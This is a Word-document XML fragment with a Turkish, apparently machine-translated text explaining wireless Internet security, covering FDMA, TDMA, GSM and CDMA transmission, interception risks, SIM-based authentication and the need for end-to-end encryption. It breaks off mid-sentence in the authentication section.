        <w:t>?</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Günümüzün kablosuz teknolojisinin sıkıntılarını ve sınırlamalarını tanıyan birçok işletme, kablosuz cihazlarını ve hizmetlerini, kablolu İnternet erişimi için zorunlu olarak değil, kablolu İnternet'in sağlayabileceklerini genişleten özel hizmetler olarak tasarlıyor. Bu hizmetlerin çoğu, bir bilgisayarın önünde oturmak zorunda kalmadan, her zaman ve her yerde taşınabilir bilgi erişiminin çekici kolaylığını vurgulamaktadır - temel olarak, birinin cebinde taşıyabileceği Internet hizmetleri. Açıkçası, bilginin özlü, taşınabilir, kullanışlı ve erişimi kolay olması gerekir. Günümüzde mevcut olan veya tasarlanan mobil servis örnekleri şunları içer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Bir cep telefonu kullanarak çevrimiçi alışveriş yapmak; gerçek bir mağazanın içindeyken çevrimiçi fiyatları mağaza fiyatları ile karşılaştırma</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Mevcut hisse senedi fiyatları, alım satım fiyatı uyarıları, ticari anlaşma ve portföy bilgilerini her yerde almak</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Banka işlemlerini yapmak ve hesap bilgilerini edinmek</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Seyahat programları almak ve rezervasyon rezervasyonları</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 xml:space="preserve">Kişiselleştirilmiş haberler ve hava durumu tahminlerini edinmek • En son piyango numaralarını almak </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 xml:space="preserve">Ekspres paketler için mevcut teslimat durumunu elde etmek </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Hareket halindeyken” e-posta okuma ve yazma • envanter, müşteri listeleri vb. Gibi şirket içi veritabanlarına erişim.</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Harita yol tarifi alma • Kullanıcının bulunduğu yere göre en yakın ATM makinelerini, restoranları, tiyatroları ve mağazaları bulmak</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911'i aramak ve acil durum servisini hızlı bir şekilde arayanın yerini belirlemek</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00D511FC" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>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tr-TR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D511FC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Bir Web sitesine göz atmak ve aynı oturum içinde sitenin temsilcisi ile canlı konuşmak.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00D511FC" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF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lastRenderedPageBreak/>
        <w:t>Yeni ve daha yenilikçi hizmetler işlerinde. Yeni ve gelişmekte olan herhangi bir teknoloji olarak, kablosuz hizmetler ve uygulamalar genellikle pek çok umut ve yutturmaca ile birlikte bazı sağlıklı şüpheciliklerle çevrilidir. Ancak teknoloji ve hizmetler zamanla olgunlaştıkça, dünkü deneyler yarının standartları olabilir. İnternet bu gelişen ilerlemenin büyük bir örneğidir. Kablosuz İnternet'in geliştirilmesi, muhtemelen daha da hızlı olmasına rağmen, muhtemelen aynı evrimsel döngüden geçecektir.</w:t>
      </w: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Bununla birlikte, herhangi bir yeni teknoloji gibi, güvenlik ve güvenlik sorunları da itibarına zarar verebilir ve en baştan tasarıma akıllıca dahil edilmemesi durumunda yararlanabilir. Bu amaçla yazıldığından bu amaç göz önünde bulundurulur.</w:t>
      </w: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Kablosuz İnternet çok fazla alanı kapladığından, aynı güvenlik için de geçerli. Bu bölüm, birkaç seçili kategoride kablosuz İnternet ile ilgili güvenlik sorunlarını tartışıyor, kablosuz cihazlara iletim yöntemleriyle başlıyor ve bazı altyapı bileşenlerinin kendileri ile bitiyo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8B667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Pr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t>4.Güvenli İletim Yöntemleri Nasıl</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Uzun yıllar boyunca, analog cep telefonu iletimlerinin kesişmesi oldukça kolaydı. Analog cep telefonları mevcut olduğu sürece bilinen bir problem olmuştur. Özel radyo tarama cihazları kullanarak kolayca yakalanabilirler. Bu sebeple, pek çok diğerinde olduğu gibi, birçok cep telefonu servis sağlayıcısı, abonelerine dijital servisleri tanıtmakta ve eski bir servise benzetmeyi azaltmaktadır.</w:t>
      </w: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Öte yandan, dijital cep telefonu yayınları, müdahale etmek için genellikle daha zorludur. Bu, aynı kablosuz yayınlarda, yeni kablosuz İnternet servislerinin çoğunun dayandığı bir sistem.</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511FC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00D511FC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">Bununla birlikte, dijital hücresel iletim için tek bir yöntem yoktur. Aslında, kablosuz iletim için bugün mevcut birkaç farklı yöntem vardır. Örneğin, Amerika Birleşik Devletleri'nde Verizon ve Sprint gibi sağlayıcılar öncelikle CDMA (Kod Bölmeli Çoklu Erişim) kullanır, AT&amp;T öncelikle TDMA (Zaman Bölmeli Çoklu Erişim) kullanır ve Voicestream GSM (Mobil İletişim için Global Sistemler) kullanır. Cingular gibi diğer sağlayıcılar, coğrafi konuma bağlı olarak birden fazla yöntem (TDMA ve GSM) sunar. Tüm bu yöntemler, radyo frekanslarını kullanma şekilleri ve kullanıcıları bu frekanslara ayırma şekilleri bakımından farklılık gösterir. Bu bölüm bunların her birini daha ayrıntılı olarak ele almaktadır.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r w:rsidRPr="00D511FC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Cep telefonu kullanıcıları, genellikle kablosuz Internet erişimi istiyorlarsa, gerçekten de umursamıyorlarsa, belirli bir iletim yöntemini seçmekle ilgilenmiyorlar. Bunun yerine, çoğu kullanıcı servise kaydolduklarında favori kablosuz servis sağlayıcılarını seçer. Sağlayıcılarının hangi aktarım yöntemini kullandığı genellikle kullanıcıya karşı şeffaftır. Bununla birlikte, servis sağlayıcı için tamamen farklı bir konudur. Hangi yöntemi uygularlarsa uygulayın, altyapısı üzerinde önemli bir etkisi var. Örneğin, kullandıkları telsiz teçhizatı türü, konuşlandırılacak iletim kulelerinin yeri ve sayısı, kullanabilecekleri trafik miktarı ve abonelerine satacağı cep telefonu türleri, seçilen dijital iletim yöntemiyle doğrudan ilişkilidir.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4.1.</w:t>
      </w:r>
      <w:r w:rsidRPr="006F40D5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t>Frekans Bölmeli Çoklu Erişim (FDMA) Teknolojis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Analog veya dijital tüm hücresel iletişim, kablosuz servis sağlayıcı tarafından satın alınan veya tahsis edilen radyo frekansları kullanılarak iletilir. Her servis sağlayıcı tipik olarak bir radyo frekansı spektrumunu çalıştırmak için ilgili hükümetten lisans satın alır.</w:t>
      </w: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Analog hücresel iletişim tipik olarak, Frekans Bölmeli Çoklu Erişim (veya FDMA) teknolojisi olarak adlandırılan şey üzerinde çalışır. FDMA ile her servis sağlayıcı, radyo frekansı spektrumunu ayrı frekans kanallarına böler. Her kanal, tek yönlü bir iletişim oturumunu destekleyen belirli bir frekanstır; ve her kanal 10 ila 30 kilohertz (kHz) genişliğe sahiptir. Düzenli bir iki yönlü telefon görüşmesi için, her cep telefonu arayanına iki frekans kanalı atanır: biri gönderilecek, diğeri alacak.</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Her telefon görüşmesi iki kanalı kapladığından (iki frekans), özel radyo tarama ekipmanı, ekipman doğru frekans kanalına ayarlandıktan sonra canlı bir analog telefon görüşmesine dokunmak için çok zor değildir. Şifreleme eklenmezse, analog hücresel iletişimde çok az gizlilik koruması vard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4.2.</w:t>
      </w:r>
      <w:r w:rsidRPr="006F40D5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t>Zaman Bölmeli Çoklu Erişim (TDMA) Teknolojis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F40D5"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Dijital hücresel sinyaller ise çoğu analog radyo frekans taramasına dirençli olan çeşitli kodlama teknikleriyle çalışabilir. (Kablosuz iletişimde "kodlama" kelimesinin şifreleme anlamına gelmediğine dikkat edin. Burada "Kodlama" genellikle bir sinyalin bir formattan diğerine, örneğin kablolu bir sinyalden kablosuz sinyale dönüştürülmesi anlamına gel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6F40D5"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lastRenderedPageBreak/>
        <w:t>Bu tekniklerden birine zaman bölmeli çoklu erişim veya TDMA denir. FDMA'ya benzer şekilde, TDMA tipik olarak radyo spektrumunu çoklu 30 kHz frekans kanallarına (bazen frekans taşıyıcıları denir) ayırır. Her iki yönlü iletişim, bu frekans kanallarından ikisini gerektirir: biri göndermek diğeri almak için. Ancak, TDMA ayrıca, her bir frekans kanalını ses / veri kanalı adı verilen üç ila altı zaman dilimine böler, böylece şimdi altı taneye kadar dijital ses veya veri oturumu aynı frekans kullanılarak gerçekleştirilebilir. TDMA ile bir servis sağlayıcı aynı anda FDMA'ya göre daha fazla çağrı yapabilir. Bu, altı seansın her birine aynı frekans içinde belirli bir zaman dilimi atamak suretiyle gerçekleştirilir. Her zaman dilimi (veya ses / veri kanalı) süresi yaklaşık yedi milisaniyedir. Zaman dilimleri hızlı dönüşlerde tekrar tekrar düzenlenir ve iletilir. Her arayan için ses veya veriler, arayan kişiye atanan zaman dilimine yerleştirilir ve ardından iletilir. Karşılık gelen zaman diliminden gelen bilgiler hızlı bir şekilde çıkartılır ve görüşme veya oturumu bir araya getirmek için alıcı hücresel baz istasyonunda tekrar birleştirilir. Bu zaman dilimi (veya ses / veri kanalı) bir arayana atandıktan sonra, o arayana sona erinceye kadar oturum süresi için ayrılmıştır. TDMA'da, bir kullanıcıya bütün bir frekans atanmaz, ancak frekansı, her biri belirlenmiş bir zaman dilimine sahip diğer kullanıcılarla paylaş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511FC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00D511FC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Bu bölümün yazılmasından itibaren, TDMA telefon konuşmalarını ve veri akışlarını kablosuz alanda dolaşırken gizlice dinleyen pek çok vaka olmamıştır. Özel bir teçhizata veya test teçhizatına erişim, muhtemelen bu tür bir başarı için gerekli olacaktır. Yasadışı olarak değiştirilmiş bir TDMA cep telefonunun da bu işi yapması mümkündü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F40D5"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F40D5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t>Bununla birlikte, bu, gizli dinlemenin olanaksız olduğu anlamına gelmez. Kablosuz bir İnternet oturumu ile ilgili olarak, böyle bir oturumun gerçekleştirdiği tam yolu göz önünde bulundurun. Bir mobil kullanıcının bir İnternet Web sitesi ile iletişim kurması için, cep telefonundan gelen bir kablosuz veri sinyali sonunda İnternet'i geçmeden önce kablolu bir sinyale dönüştürülür. Kablolu bir sinyal olarak, bilgiler Web sitesine erişinceye kadar İnternet'te açık metin olarak seyahat edebilir. Her ne kadar kablosuz sinyalin kendisi müdahale etmekte zorlanabilirse de, bir kez kablolu bir sinyal haline geldiğinde, Internet'te dolaşan tüm şifrelenmemiş iletişim ile aynı durdurma güvenlik açılarına maruz kal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Önlem olarak, internetten gizli bilgiler varsa, yöntemden bağımsız olarak, bu oturumu baştan sona şifrelemek gerekir. Şifreleme daha sonraki bir bölümde ele alınmışt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4.3.</w:t>
      </w:r>
      <w:r w:rsidRPr="008B38ED">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t>Mobil İletişim için Global Sistemler (GSM)</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lastRenderedPageBreak/>
        <w:t>Dijital iletimin bir diğer yöntemi, Mobil İletişim için Global Sistemlerdir (GSM). GSM aslında sadece iletim yönteminden daha fazlasını kapsayan bir terimdir. GSM servislerinin çeşitliliğinden, mevcut GSM cihazlarının kendisine kadar tüm hücresel sistemi kapsar. GSM, öncelikle Avrupa ülkelerinde kullanılmaktad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Dijital bir iletim yöntemi olarak GSM, bir TDMA varyasyonunu kullanır. FDMA ve TDMA'ya benzer şekilde, GSM servis sağlayıcısı, ayrılan radyo frekansı spektrumunu çoklu frekans kanallarına böler. Bu sefer, her bir frekans kanalı 200 kHz daha büyük bir genişliğe sahiptir. Yine, FDMA ve TDMA'ya benzer şekilde, her bir GSM cep telefonu iki frekans kanalı kullanır: biri göndermek diğeri almak için.</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511FC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00D511FC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>TDMA gibi, GSM ayrıca her bir frekans kanalını ses / veri kanalı adı verilen zaman aralıklarına böler. Ancak, GSM ile sekiz zaman dilimi vardır, böylece şimdi aynı frekansı kullanarak sekiz taneye kadar dijital ses veya veri oturumu gerçekleşebilir. TDMA’ya gelince, bir zaman dilimi (veya ses / veri kanalı) bir arayana tahsis edildiğinde, arayana, sona erinceye kadar oturum süresi boyunca atanmışt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GSM, güvenliği artıran ek özelliklere sahiptir. Her GSM telefonu bir abone kimlik modülü (veya SIM) kullanır. SIM, kredi kartı boyutunda bir akıllı kart veya posta pulu boyutunda bir yonga gibi görünebilir. Bu çıkarılabilir SIM, kullanım sırasında GSM telefonuna yerleştirilir. Akıllı kart veya çip, aboneye ait cep telefonu numarası, aboneye ait kimlik doğrulama bilgileri, şifreleme anahtarları, telefon numaraları dizini ve bu aboneye ait kısa kaydedilmiş mesajlar gibi aboneye ait bilgiler içerir. SIM çıkarılabildiğinden, abone bu SIM'i bir telefondan alabilir ve başka bir GSM telefonuna yerleştirebilir. SIM'li yeni telefon daha sonra abonenin kimliğini alacaktır. Kullanıcının kimliği belirli bir telefona değil, çıkarılabilir SIM'in kendisine bağlı. Bu, bir abonenin, telefon numaralarını değiştirmeden farklı GSM telefonlarına kullanmasını veya yükseltmesini mümkün kılar. Başka bir ülkede bir GSM telefonu kiralamak da mümkündür, bu ülke farklı GSM frekanslarında ileten telefonları kullansa bile. Elbette bu düzenleme, sadece farklı ülkelerden gelen GSM servis sağlayıcıların birbirleriyle uyumlu düzenlemelere sahip olması durumunda işe yara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SIM, kimlik doğrulama aracı olarak işlev görür, çünkü GSM telefonları onsuz kullanılamaz. SIM bir telefona yerleştirildikten sonra, kullanıcıların bu SIM'le ilişkili kişisel kimlik numaralarını (PIN) girmeleri istenir (SIM PIN’ etkin ise). Doğru PIN numarası olmadan, telefon çalışmayacaktır.</w:t>
      </w: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 xml:space="preserve">Kullanıcının telefona doğrulanmasının yanı sıra, SIM, bağlantı sırasında telefonu telefonun kendisine doğrulamak için de kullanılır. SIM'deki kimlik doğrulama (veya Ki) tuşunu kullanarak, telefon, her görüşme sırasında servis sağlayıcının Kimlik Doğrulama Merkezine doğrulanır. Süreç, bazı açılardan bir PC'yi uzaktan bir ağa </w:t>
      </w:r>
      <w:r w:rsidRPr="008B38ED">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>kaydetmek için bir belirteç kartı kullanmaya benzer şekilde, bir meydan okuma yanıt tekniği kullanmaktad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SIM'deki tuşların, kimlik doğrulamanın yanı sıra başka bir amacı vardır. SIM tarafından oluşturulan şifreleme (veya Kc) tuşu, cep telefonu ile servis sağlayıcının iletim ekipmanları arasındaki iletişimi gizlilik amacıyla şifrelemek için kullanılabilir. Bu şifreleme, en azından bu iki nokta arasında gizli dinlenmeyi önle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TDMA'ya benzer olan GSM yayınları, radyo frekansı tarama ekipmanlarını kullanarak müdahale etmek zor, ancak imkansız değildir. Üzerinde bir frekans bulunan sekiz kullanıcı olabilir ve bu sayede dijital sinyaller ayıklanır. GSM, SIM kartı kullanarak şifreleme ekleyerek araya girmeye karşı başka bir güvenlik katmanı ekleyebil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Ancak, kablosuz İnternet oturumları söz konusu olduğunda, bu şifreleme biçimi uçtan uca koruma sağlamaz. Yolun sadece bir kısmı gerçekten korunuyor. Bu, TDMA İnternet oturumlarında daha önce bahsedilen soruna benzer. Tipik bir kablosuz İnternet oturumu hem kablosuz hem de kablolu bir yol izler. GSM şifreleme, yalnızca cep telefonu ile servis sağlayıcının iletim sitesi - kablosuz bağlantı arasındaki yolu korur. Oturumun geri kalanı, kablolu yayın İnternet üzerinden - servis sağlayıcının sitesinden İnternet Web sitesine - hala net olarak seyahat edebilir. İnternet oturumunun tamamını gizli tutmak gerekiyorsa, uçtan uca şifreleme yapılması gerekecekt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4.4.</w:t>
      </w:r>
      <w:r w:rsidRPr="008B38ED">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t>Kod Bölmeli Çoklu Erişim (CDMA) Teknolojis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aşka bir dijital iletim yöntemine kod bölmeli çoklu erişim veya CDMA denir. CDMA, ABD ordusu tarafından yıllardır radyo iletişimini kesmek ve sıkışmak için daha zor hale getirmek için kullanılan bir iletim teknolojisi olan yayılma spektrumuna dayanmaktadır. Qualcomm, CDMA spread spectrum teknolojisini cep telefonları alanına dahil eden öncülerden birid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ir radyo frekansı spektrumunu dar frekans bantlarına veya zaman aralıklarına bölmek yerine, CDMA aynı zamanda bir frekans kanalı olarak da adlandırılan bu radyo spektrumunun çok büyük bir bölümünü kullanır. Frekans kanalı 1.25 megahertz (MHz) genişliğindedir. Çift yönlü iletişim için, her cep telefonu bu geniş CDMA frekans kanallarından ikisini kullanır: biri gönderilecek, biri alacak.</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lastRenderedPageBreak/>
        <w:t>İletişim sırasında, her ses veya veri oturumu ilk önce bir dizi veri sinyaline dönüştürülür. Daha sonra, sinyaller belirli bir arayana ait olduklarını belirtmek için benzersiz bir kodla işaretlenir. Bu kod sözde rasgele gürültü (PN) kodu olarak adlandırılır. Her cep telefonuna, her oturumun başında baz istasyonu tarafından yeni bir PN kodu atanır. Bu kodlanmış sinyaller daha sonra çok geniş bir radyo frekansı spektrumuna yayılarak iletilir. Kanal genişliği çok büyük olduğu için, diğer birçok kullanıcı oturumunu aynı anda idare etme kapasitesine sahiptir, her bir seans tekrar onları uygun arayanla ilişkilendirmek için benzersiz PN kodları ile etiketlen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ir CDMA telefonu, kendisine yönelik veri sinyallerini almak için uygun PN kodunu kullanarak iletimleri alır ve diğer tüm kodlanmış sinyalleri yok saya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r w:rsidRPr="00D511FC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00D511FC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>CDMA ile, baz istasyonlarıyla iletişim kuran cep telefonları aynı geniş frekans kanallarını paylaşıyor. Her arayanı ayıran, kullanılan frekans (FDMA'daki gibi) veya belirli bir frekanstaki (TDMA veya GSM'deki gibi) zaman aralığı değil, o arayan kişiye atanan PN gürültü kodu. CDMA ile, bir ses / veri kanalı, benzersiz bir PN koduyla işaretlenmiş bir veri sinyalid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Tek bir CDMA görüşmesini yakalamak zor olacaktır çünkü dijital sinyalleri çok geniş bir radyo frekansı spektrumuna yayılmıştır. Konuşma, yalnızca tek bir frekansta yapılmaz, bu da taramayı zorlaştırır. Ayrıca, PN gürültü kodunu bilmeden, bir gizli dinleme cihazı, ilgili oturumu kullanılan birçok frekanstan çıkaramaz. Kesişmeyi daha da karmaşıklaştırmak için, tüm kanal genişliği aynı anda diğer birçok arayan tarafından doldurulur ve aramaya müdahale etmeye çalışan herkes için çok miktarda gürültü çıka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Ancak, daha önce diğer dijital iletim yöntemlerinde görüldüğü gibi, CDMA cep telefonlarını kullanarak yapılan İnternet oturumlarının araya girmesi imkansız değildir. Önceden olduğu gibi, CDMA dijital sinyallerinin kendileri müdahale etmekte zorlanabilse de, bu kablosuz sinyaller kablolu sinyallere dönüştürüldükten sonra, bu sinyaller İnternet'te dolaşırken yakalanabilir. Uçtan uca şifreleme kullanmadan, kablosuz İnternet oturumları, Internet üzerinden seyahat eden diğer şifrelenmemiş iletişim kadar savunmasızdı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4.5.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t>Diğer Y</w:t>
      </w:r>
      <w:r w:rsidRPr="008B38ED">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t>öntemle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irçoğu daha önce tartışılan türlerin türevleri olan ve bazıları hala geliştirilme aşamasında olan ek dijital iletim yöntemleri vardır. Geliştirilmekte olan bunlardan bazıları</w:t>
      </w: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lastRenderedPageBreak/>
        <w:t>üçüncü nesil veya 3G iletim yöntemleri. TDMA, GSM ve CDMA gibi ikinci nesil (2G) teknolojiler, günümüzün tipik modem hızlarından daha yavaş olan 9,6 - 14,4 Kbps (saniye başına kilobit) iletim hızları sunar. 3G teknolojileri ise daha hızlı iletmek ve daha büyük miktarda veri taşımak için tasarlanmıştır. Bazıları video iletiminin yanı sıra yüksek hızlı İnternet erişimi sağlama yeteneğine sahip olacak.</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sidRPr="00BA434F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t>5.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t>Güvenli Kablosuz Cihazlar Nasıl?</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Günümüzde kurumsal ağlara uygulandığını gördüğü gibi, İnternet güvenliği, çeşitli nedenlerden dolayı, kablosuz telefonlarda ve PDA'larda uygulamada zor olabilir. Bu cihazların çoğu sınırlı CPU, hafıza, bant genişliği ve depolama yeteneklerine sahiptir. Sonuç olarak, çoğu hayal kırıklığıyla yavaş ve sınırlı bir bilgi işlem gücüne sahip. Tipik bir iş istasyonunda işlem yapmak bir saniyeden daha az zaman alabilen sağlam güvenlik özellikleri, kablosuz bir cihazda potansiyel olarak birkaç dakika sürebilir, bu da mobil kullanıcı için pratik ya da elverişsiz hale getirebilir. Bu cihazların çoğu, tipik iş istasyonlarında bulunan donanım özelliklerinin yalnızca bir kısmına sahip olduğundan, taşınabilir cihazlardaki güvenlik özellikleri genellikle hafif ve hatta bulunmaz - İnternet güvenliği açısından. Ancak, bu aynı cihazlar artık hassas şirket intranetlerine giriş yapmak veya mobil ticaret ve bankacılık yapmak için kullanılıyor. Her ne kadar bu kablosuz cihazlar her yönden daha küçük olsa da, güvenlik ihtiyaçları eskisi kadar önemlidir. Kurumsal BT ve bilgi güvenliği departmanlarının, kurumsal ağları doldurmaya başlarken bu cihazları görmezden gelmeleri bir hata olur. Sonuçta, bu cihazlar ayrımcılık yapmıyor; bir ağdaki diğer düğümlerle aynı şirket varlıklarına girmek için tasarlanabilirler. Bu cihazlarla ilgili güvenlik unsurlarından bazıları burada incelenmiştir.</w:t>
      </w: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themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>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themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA434F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t>5.1.</w:t>
      </w:r>
      <w:r w:rsidRPr="008B38ED">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t>Doğrulama</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Telsiz telefon kullanıcılarının kimliklerini doğrulama süreci uzun yıllar süren uygulama ve gelişim sürecinden geçti. Servis sağlayıcıların kablosuz servis hırsızlığını azaltmaya çalışırken uzun yıllara dayanan deneyimleri göz önüne alındığında, dijital cep telefonlarının bugün sahip olduğu en güvenilir güvenlik özelliklerinden biridir. Servis sağlayıcılar, servislerinin kullanımı için kimlerin ücretlendirileceğini bilmeye büyük ilgi duyduğundan, mobil kullanıcının kimliğini doğrulamak çok önemlidir.</w:t>
      </w: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Daha önce belirtildiği gibi, GSM telefonlar, kullanıcı hakkında kimlik doğrulama bilgisi içeren SIM kartlar veya cips kullanırlar. SIM'ler genellikle kimlik doğrulama ve şifreleme anahtarları, kimlik doğrulama algoritmaları, kimlik bilgileri, aboneye ait telefon numaraları, vb. Taş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ununla birlikte, önemli bir not, bu kimlik doğrulama şeklinin mutlaka İnternet ile ilgili işlemler için geçerli olmadığıdır. Mobil kullanıcıyı yalnızca İnternet işlemleriyle ilgili konuşuyorsa, iletimin yalnızca bir parçası olan servis sağlayıcının telefon şebekesine doğrular. Uçtan uca İnternet işlemlerini güvence altına almak için, mobil kullanıcıların hala gerçekten yasal olduklarını doğrulamak için, bağlandıkları İnternet Web sunucularını doğrulamaları gerekir. Aynı şekilde, Internet Web sunucularının da meşru kullanıcılar olduklarını ve sahtekâr olmadıklarını doğrulamak için kendisine bağlanan mobil kullanıcıları doğrulamaları gerekir. Bununla birlikte, kablosuz iletişim servis sağlayıcıları nadiren, cep telefonundan İnternet Web sitesine kadar uçtan uca kimlik doğrulama hizmeti sağlamada görevlidirler. Bu sorumluluk genellikle İnternet Web sunucularının ve uygulamalarının sahiplerine düşe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Baştan sona kimlik doğrulama için çeşitli yöntemler bugün uygulama düzeyinde denenmektedir. Güvenli mobil ticaret uygulamalarının çoğu, yalnızca tek faktörlü kimlik doğrulaması sağladığı için elbette sınırlamaları olan eski bir bekleme kimliği ve parola kullanıyor. Diğer kuruluşlar, SIM'lere açık / özel anahtar çiftleri, dijital sertifikalar ve diğer açık anahtar altyapısı (PKI) bileşenleri gibi ek güvenlik bileşenleri ekleyerek GSM SIM'leri denemektedir. Bununla birlikte, dijital sertifikaların kullanımı işlem yoğun olabileceğinden, cep telefonları ve elde tutulan cihazlar genellikle bu güvenlik 